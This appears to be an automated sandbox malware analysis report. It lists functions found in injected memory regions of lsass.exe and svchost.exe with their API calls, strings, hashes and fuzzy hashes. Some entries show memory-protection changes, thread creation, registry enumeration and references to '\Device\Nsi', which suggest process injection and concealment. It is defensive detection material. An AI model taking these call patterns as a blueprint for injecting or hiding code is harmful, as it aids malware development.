Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: B111A036ADEAC003F6A81168F4D7BEB1040FB64B76F492624AE76D63D78B1ACC534300

Function 000001CB338E3878 Relevance: 7.5, APIs: 5, Instructions: 45COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001CB338E3886
GetCurrentProcess.KERNEL32 ref: 000001CB338E38B4
VirtualProtectEx.KERNEL32 ref: 000001CB338E38D6
GetCurrentProcess.KERNEL32 ref: 000001CB338E38F4
VirtualProtectEx.KERNEL32 ref: 000001CB338E3915

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: a92f69a6ed7a39524b1d71671181da407fb4c383502b3014595b4fe9b9fc2c6d
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 1A11823974AB8083FB149B15F445B9AA670F785F81F042025DE8987794EF7EC946C700

Function 000001CB338B84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CB338B8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001CB338B8598

Strings

csm, xrefs: 000001CB338B857E
f, xrefs: 000001CB338B8516

Memory Dump Source

Source File: 00000009.00000002.2664682131.000001CB338B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338b0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction ID: 32951831cf89cd42a16c3dd9a06331f200084fa1cf99098a3fb41fda63e6641e
Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
Instruction Fuzzy Hash: 7151B23265B6C68AFB14CF15D489F9A3795F341F9BF55A924DE0683788EF38C8428704

Function 000001CB338B84D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001CB338B8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001CB338B8598

Strings

csm, xrefs: 000001CB338B857E
f, xrefs: 000001CB338B8516

Memory Dump Source

Source File: 00000009.00000002.2664682131.000001CB338B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338b0000_lsass.jbxd

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm$f
API String ID: 3242871069-629598281
Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction ID: ab45e42f5d8abc5ed23a1275e835ea749bd5e9ab4f100a15ecdfa6445ff9d59b
Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
Instruction Fuzzy Hash: F831AD7225A6C286FB14DF11E8C5F9A77A4F740F8AF15A514AE4A87794CF3CC942C704

Function 000001CB338E14B4 Relevance: 6.3, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CB338E14D5
HeapFree.KERNEL32 ref: 000001CB338E14E4
GetProcessHeap.KERNEL32 ref: 000001CB338E14F0
HeapFree.KERNEL32 ref: 000001CB338E14FF
GetProcessHeap.KERNEL32 ref: 000001CB338E152A

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Heap$Process$Free
String ID:
API String ID: 3168794593-0
Opcode ID: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction ID: e3b1004b57a62b041e0ac451d3bb9306ae0ba7cb75eb681e7ecd8a8dd3def641
Opcode Fuzzy Hash: 58c4a46a428cd9431a43c23367012082d3a0a44734d7d4b43a30409f6f14bb0b
Instruction Fuzzy Hash: 96118F32519BC492F754AF66F48569BB360F389F85F045015EF8A43754DF39C1828700

Function 000001CB338E24DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 000001CB338E25C3
StrCpyW.SHLWAPI ref: 000001CB338E25DA

Strings

\\.\pipe\, xrefs: 000001CB338E25CE

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction ID: 623ab5c0233e9eea1bab3c8fe46416b911fe79bfa5c751f4448e654effed0453
Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
Instruction Fuzzy Hash: 3C51D83224E7C182F674AF6DE5D6BEB6651F385F81F042125DD8A83BA9CB35C4078B40

Function 000001CB338F0604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 000001CB338F071B
GetLastError.KERNEL32 ref: 000001CB338F073D

Strings

U, xrefs: 000001CB338F06C7

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction ID: 015bd3a9c914ebf58dd732adfdd10b8c5ff253d4599a542cd249b895547cbef8
Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
Instruction Fuzzy Hash: 6041A27221AB8086EB209F65F4857DAA7A1F788B85F405025EE8DC7798DB3DC542CB40

Function 000001CB338ED6C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001CB338ED6F9
LCMapStringW.KERNEL32 ref: 000001CB338ED781

Strings

LCMapStringEx, xrefs: 000001CB338ED6DC, 000001CB338ED6ED

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Stringtry_get_function
String ID: LCMapStringEx
API String ID: 2588686239-3893581201
Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction ID: 0572907a0b52b6aa765b88d5463161c31580de8921f5093de93e672b10dc9954
Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
Instruction Fuzzy Hash: 4711173660CBC08AE760DB16F881A9AB7A4F7C9BD4F545126EE8D83B59DF38C455CB00

Function 000001CB338E94A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.NTDLL ref: 000001CB338E94E8
RaiseException.KERNEL32 ref: 000001CB338E952E

Strings

csm, xrefs: 000001CB338E951B

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction ID: ec83b11fee553f795087f99ec0b32c95111e6847f7d2c86749e096d5f58fa851
Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
Instruction Fuzzy Hash: 31114C32209B8082EB618F19F48069A77A0F788F99F185224DFCD4BB68DF7DC552CB00

Function 000001CB338ED65C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001CB338ED68D
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000001CB338ED6A7

Strings

InitializeCriticalSectionEx, xrefs: 000001CB338ED681

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpintry_get_function
String ID: InitializeCriticalSectionEx
API String ID: 539475747-3084827643
Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction ID: e936455b235f0237aadf95611627cab184adf6563daa5c8d617e337afa4ee394
Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
Instruction Fuzzy Hash: 74F0BE3135EBC092F604AB55B482AD72220BB88F86F486022AD4943B14CF3AC99AC740

Function 000001CB338BCB9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001CB338BCBC5

Strings

October, xrefs: 000001CB338BCBBE
November, xrefs: 000001CB338BCBA8, 000001CB338BCBB2

Memory Dump Source

Source File: 00000009.00000002.2664682131.000001CB338B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338b0000_lsass.jbxd

Similarity

API ID: try_get_function
String ID: November$October
API String ID: 2742660187-1636048786
Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction ID: e41ea392005065ed7d961d6c730a9bec1ae94c1c71c12dd36f29fff9eb11d53e
Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
Instruction Fuzzy Hash: 09E0303128A5C291FA059B55A4C2ADA6221BB44B41F5970229D55463A2CF3CC8C78300

Function 000001CB338ED608 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 000001CB338ED631
TlsSetValue.KERNEL32 ref: 000001CB338ED648

Strings

FlsSetValue, xrefs: 000001CB338ED61E

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Valuetry_get_function
String ID: FlsSetValue
API String ID: 738293619-3750699315
Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction ID: 3bed4fc48169cb569d76dfcff085be64282ee2e9da9166107fcae072f8334c38
Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
Instruction Fuzzy Hash: 4CE0657124E6C091FA045B64F882ED62222BB88F86F596022DD0987355CF39C89FC700

Function 000001CB338E1D60 Relevance: 5.1, APIs: 4, Instructions: 66memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CB338E1D9B
HeapAlloc.KERNEL32 ref: 000001CB338E1DAA
GetProcessHeap.KERNEL32 ref: 000001CB338E1E1E
HeapFree.KERNEL32 ref: 000001CB338E1E2C

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction ID: 77b58182167d8afeb2b4873da874a6685340b5d9bcc53e2c82b234f5095ec4d5
Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
Instruction Fuzzy Hash: 9C217C3264ABD082FB519F6AF44169BF3A0FB88F95F155110EE8C87B24EB78C5838700

Function 000001CB338E1274 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001CB338E127A
HeapAlloc.KERNEL32 ref: 000001CB338E1289
GetProcessHeap.KERNEL32 ref: 000001CB338E12A3
HeapAlloc.KERNEL32 ref: 000001CB338E12B4

Memory Dump Source

Source File: 00000009.00000002.2665413756.000001CB338E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CB338E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1cb338e0000_lsass.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction ID: a97724dfd2cab1611f15b16932976088bd516ce71ca8d6d6fdd77eb4d602ef38
Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
Instruction Fuzzy Hash: F1E06D7165264086F704AF62E84578A36E1FB88F02F48D024CD0987350EFBEC5DAC740

Analysis Process: svchost.exePID: 916, Parent PID: 8108COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	68
Total number of Limit Nodes:	2

Executed Functions

Function 0000026E027C3458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 0000026E027C347A
PathFindFileNameW.SHLWAPI ref: 0000026E027C3489

Part of subcall function 0000026E027C3930: StrCmpNIW.SHLWAPI ref: 0000026E027C3948

Part of subcall function 0000026E027C3878: GetModuleHandleW.KERNEL32 ref: 0000026E027C3886
Part of subcall function 0000026E027C3878: GetCurrentProcess.KERNEL32 ref: 0000026E027C38B4
Part of subcall function 0000026E027C3878: VirtualProtectEx.KERNEL32 ref: 0000026E027C38D6
Part of subcall function 0000026E027C3878: GetCurrentProcess.KERNEL32 ref: 0000026E027C38F4
Part of subcall function 0000026E027C3878: VirtualProtectEx.KERNEL32 ref: 0000026E027C3915

CreateThread.KERNEL32 ref: 0000026E027C34D7

Part of subcall function 0000026E027C1EB4: GetCurrentThread.KERNEL32 ref: 0000026E027C1EBF

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: c2f8ea4661837c6de5e48aaa53c5ce441db971c221d9d48b770f4cd3854a0070
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: CD11C4786106014BFF229730F8CE37522E0B748705F6E816C994AA51D4EFFFC1448600

Function 0000026E027C1C28 Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000026E027C1650: GetProcessHeap.KERNEL32 ref: 0000026E027C165B
Part of subcall function 0000026E027C1650: HeapAlloc.KERNEL32 ref: 0000026E027C166A
Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C16DA
Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C1707
Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C1721
Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C1741
Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C175C
Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C177C
Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C1797
Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C17B7
Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C17D2
Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C17F2

Sleep.KERNEL32 ref: 0000026E027C1C43
SleepEx.KERNELBASE ref: 0000026E027C1C49

Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C180D
Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C182D
Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C1848
Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C1868
Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C1883
Part of subcall function 0000026E027C1650: RegOpenKeyExW.ADVAPI32 ref: 0000026E027C18A3
Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C18BE
Part of subcall function 0000026E027C1650: RegCloseKey.ADVAPI32 ref: 0000026E027C18C8

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction ID: 5c73b9ac12fb820ad7dcc6394d5cd69c523895347f81a8289b2402209744e123
Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
Instruction Fuzzy Hash: 8E31F03D301A019AFE509F37E5D937A13E4AB44BD0FAE4039DE4DA76D7DE96C4508250

Function 0000026E027C3930 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 0000026E027C3948

Strings

dialer, xrefs: 0000026E027C3941

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID:
String ID: dialer
API String ID: 0-3528709123
Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction ID: 72c475c57b13db6b953ca7df810b580f0bba01eafd113f63ce8091b0cefd85a7
Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
Instruction Fuzzy Hash: C0D05E3871164A8FEF189FE288C967023A0AB04708F4D81658E4112194D79A998D8A10

Function 0000026E02792908 Relevance: 1.7, APIs: 1, Instructions: 186
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 0000026E02792A31

Memory Dump Source

Source File: 0000000A.00000002.2628133468.0000026E02790000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E02790000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e02790000_svchost.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 0b81e5929da853fd44c803ce6b2a9aa3d9b25448aaa336044af01679fb6d3b5d
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: F761103A7017509BEE68EF25D488778B3D1FB04BA4F1A8025DE19177C6EB7AE852C704

Non-executed Functions

Function 0000026E027C2CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264
stringlibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0000026E027C2D80
lstrlenW.KERNEL32 ref: 0000026E027C2FBA

Part of subcall function 0000026E027C1A14: OpenProcess.KERNEL32 ref: 0000026E027C1A3A
Part of subcall function 0000026E027C1A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000026E027C1A58
Part of subcall function 0000026E027C1A14: PathFindFileNameW.SHLWAPI ref: 0000026E027C1A67
Part of subcall function 0000026E027C1A14: lstrlenW.KERNEL32 ref: 0000026E027C1A73
Part of subcall function 0000026E027C1A14: StrCpyW.SHLWAPI ref: 0000026E027C1A86
Part of subcall function 0000026E027C1A14: CloseHandle.KERNEL32 ref: 0000026E027C1A94

GetProcAddress.KERNEL32 ref: 0000026E027C2D95

Part of subcall function 0000026E027C1554: StrCmpIW.SHLWAPI ref: 0000026E027C1585

Part of subcall function 0000026E027C3930: StrCmpNIW.SHLWAPI ref: 0000026E027C3948

StrCmpNIW.SHLWAPI ref: 0000026E027C2DD8
lstrlenW.KERNEL32 ref: 0000026E027C2F00

Strings

NtQueryObject, xrefs: 0000026E027C2D8B
\Device\Nsi, xrefs: 0000026E027C2DCB
ntdll.dll, xrefs: 0000026E027C2D79

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: ab0ab5812e97bc83c4bf3823a8666a6cfbeb3f6612aca29d223c33e78b1b3bb7
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 3FB1EF7A210A508AEF658F35C4887B963E5F744B94F6A501AEE49737D5DFB6CC80C340

Function 0000026E027C7E70 Relevance: 10.6, APIs: 7, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000026E027C7E8C
RtlCaptureContext.NTDLL ref: 0000026E027C7EB9
RtlLookupFunctionEntry.NTDLL ref: 0000026E027C7ED3
RtlVirtualUnwind.NTDLL ref: 0000026E027C7F14
IsDebuggerPresent.KERNEL32 ref: 0000026E027C7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000026E027C7F89
UnhandledExceptionFilter.KERNEL32 ref: 0000026E027C7F94

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 7145d7ffe0b120577a17de370ec565026b85cd869d514bfc2c53cbc019b93ac4
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: C7316F76204B808AEB649F60E8847EE73B4F784744F49442ADA8E57BD8EF79C548CB10

Function 0000026E027CB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000026E027CB585
RtlLookupFunctionEntry.NTDLL ref: 0000026E027CB59D
RtlVirtualUnwind.NTDLL ref: 0000026E027CB5D8
IsDebuggerPresent.KERNEL32 ref: 0000026E027CB611
SetUnhandledExceptionFilter.KERNEL32 ref: 0000026E027CB61B
UnhandledExceptionFilter.KERNEL32 ref: 0000026E027CB626

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: d0258cd8ee7dd3dd1ded64580f543459be1bb1188360d13ab1e02aa565c7f35b
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 91315F3A214F808ADB60CF35E8847AE73E4F788758F59011AEA9D57B94DF79C545CB00

Function 0000026E027CFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000026E027CFF67
WriteFile.KERNEL32 ref: 0000026E027D021E
WriteFile.KERNEL32 ref: 0000026E027D0270
GetLastError.KERNEL32 ref: 0000026E027D0372
GetLastError.KERNEL32 ref: 0000026E027D03D2

Memory Dump Source

Source File: 0000000A.00000002.2629327141.0000026E027C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000026E027C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_26e027c0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: c900164d5df396f03e74ad42f1f1b6641d3b052e327a8ce0ff7da57f221de759
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 85E1DE36A08A809FEB00CF64D4882ED7BF1F345788F59511ADE8A67BD9DAB6C516C700

Function 0000026E027C1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000026E027C165B
HeapAlloc.KERNEL32 ref: 0000026E027C166A

Part of subcall function 0000026E027C1274: GetProcessHeap.KERNEL32 ref: 0000026E027C127A
Part of subcall function 0000026E027C1274: HeapAlloc.KERNEL32 ref: 0000026E027C1289
Part of subcall function 0000026E027C1274: GetProcessHeap.KERNEL32 ref: 0000026E027C12A3
Part of subcall function 0000026E027C1274: HeapAlloc.KERNEL32 ref: 0000026E027C12B4

RegOpenKeyExW.ADVAPI32 ref: 0000026E027C16DA
RegOpenKeyExW.ADVAPI32 ref: 0000026E027C1707
RegCloseKey.ADVAPI32 ref: 0000026E027C1721
RegOpenKeyExW.ADVAPI32 ref: 0000026E027C1741
RegCloseKey.ADVAPI32 ref: 0000026E027C175C
RegOpenKeyExW.ADVAPI32 ref: 0000026E027C177C
RegCloseKey.ADVAPI32 ref: 0000026E027C1797
RegOpenKeyExW.ADVAPI32 ref: 0000026E027C17B7
RegCloseKey.ADVAPI32 ref: 0000026E027C17D2
RegOpenKeyExW.ADVAPI32 ref: 0000026E027C17F2
RegCloseKey.ADVAPI32 ref: 0000026E027C180D
RegOpenKeyExW.ADVAPI32 ref: 0000026E027C182D
RegCloseKey.ADVAPI32 ref: 0000026E027C1848
RegOpenKeyExW.ADVAPI32 ref: 0000026E027C1868
RegCloseKey.ADVAPI32 ref: 0000026E027C1883
RegOpenKeyExW.ADVAPI32 ref: 0000026E027C18A3
RegCloseKey.ADVAPI32 ref: 0000026E027C18BE
RegCloseKey.ADVAPI32 ref: 0000026E027C18C8

Part of subcall function 0000026E027C12C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000026E027C1326
Part of subcall function 0000026E027C12C8: GetProcessHeap.KERNEL32 ref: 0000026E027C1334
